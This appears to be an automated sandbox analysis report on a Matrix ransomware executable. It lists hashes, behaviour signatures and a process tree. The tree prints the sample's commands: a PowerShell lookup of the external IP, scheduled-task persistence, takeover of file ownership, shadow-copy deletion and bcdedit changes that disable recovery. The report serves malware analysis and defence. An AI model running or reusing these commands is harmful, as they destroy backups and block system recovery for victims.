Overview

overview

10

Static

static

6e9060d56e...0b.exe

windows7_x64

10

6e9060d56e...0b.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    08-10-2020 15:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Score
10/10
ransomwareevasionupxpersistencematrixdiscovery

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 498 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blacklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Sets service image path in registry 2 TTPs
    persistence
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 11 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 7625 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Control Panel 5 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 108 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
    "C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\NWodi944.exe"
      2⤵
        PID:1920
      • C:\Users\Admin\AppData\Local\Temp\NWodi944.exe
        "C:\Users\Admin\AppData\Local\Temp\NWodi944.exe" -n
        2⤵
        • Executes dropped EXE
        PID:1968
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\ST2Yn9mk.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:108
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blacklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1164
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BJ2ttsem.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BJ2ttsem.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          • Modifies Control Panel
          PID:828
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
          • Modifies Control Panel
          PID:524
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
          3⤵
          • Matrix Ransomware
          • Modifies Control Panel
          PID:752
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GivrCxyY.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\SysWOW64\wscript.exe
          wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GivrCxyY.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:788
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat" /sc minute /mo 5 /RL HIGHEST /F
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1388
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat" /sc minute /mo 5 /RL HIGHEST /F
              5⤵
              • Creates scheduled task(s)
              PID:1324
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1836
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /I /tn DSHCA
              5⤵
                PID:1576
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\HRiS85Na.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1516
          • C:\Windows\SysWOW64\attrib.exe
            attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
            3⤵
            • Views/modifies file attributes
            PID:1400
          • C:\Windows\SysWOW64\cacls.exe
            cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
            3⤵
              PID:1904
            • C:\Windows\SysWOW64\takeown.exe
              takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
              3⤵
              • Modifies file permissions
              PID:1480
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
              3⤵
              • Loads dropped DLL
              PID:1000
              • C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe
                GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1284
                • C:\Users\Admin\AppData\Local\Temp\GBVottoK64.exe
                  GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
                  5⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • Modifies service
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: LoadsDriver
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1216
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {4CA8C3E2-9FB4-4250-86BD-FB786BBAC5A4} S-1-5-21-403932158-3302036622-1224131197-1000:ELJKIHEZ\Admin:Interactive:[1]
          1⤵
            PID:1404
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat"
              2⤵
                PID:568
                • C:\Windows\system32\vssadmin.exe
                  vssadmin Delete Shadows /All /Quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:1440
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic SHADOWCOPY DELETE
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1544
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                  3⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1224
                  • C:\Windows\system32\vssadmin.exe
                    "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                    4⤵
                    • Interacts with shadow copies
                    PID:792
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} recoveryenabled No
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1544
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:556
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN DSHCA /F
                  3⤵
                    PID:1336
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Modifies service
                • Suspicious use of AdjustPrivilegeToken
                PID:1688

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/788-44-0x0000000002830000-0x0000000002834000-memory.dmp

                Filesize

                16KB

                Download

              • memory/1164-29-0x0000000006310000-0x0000000006311000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1164-8-0x0000000074580000-0x0000000074C6E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/1164-9-0x0000000002340000-0x0000000002341000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1164-10-0x0000000004760000-0x0000000004761000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1164-11-0x0000000002510000-0x0000000002511000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1164-12-0x0000000005260000-0x0000000005261000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1164-15-0x00000000056A0000-0x00000000056A1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1164-20-0x00000000056E0000-0x00000000056E1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1164-21-0x0000000006130000-0x0000000006131000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1164-28-0x0000000006230000-0x0000000006231000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-64-0x0000000002440000-0x0000000002441000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-76-0x000000001AAD0000-0x000000001AAD1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-99-0x000000001B5F0000-0x000000001B5F1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-92-0x000000001B6B0000-0x000000001B6B1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-85-0x000000001AAF0000-0x000000001AAF1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-61-0x000007FEF6000000-0x000007FEF69EC000-memory.dmp

                Filesize

                9.9MB

                Download

              • memory/1224-62-0x0000000002400000-0x0000000002401000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-63-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-78-0x000000001AB00000-0x000000001AB01000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-65-0x0000000002360000-0x0000000002361000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-77-0x000000001AAF0000-0x000000001AAF1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-69-0x000000001A830000-0x000000001A831000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-74-0x000000001A870000-0x000000001A871000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1224-75-0x000000001AAC0000-0x000000001AAC1000-memory.dmp

                Filesize

                4KB

                Download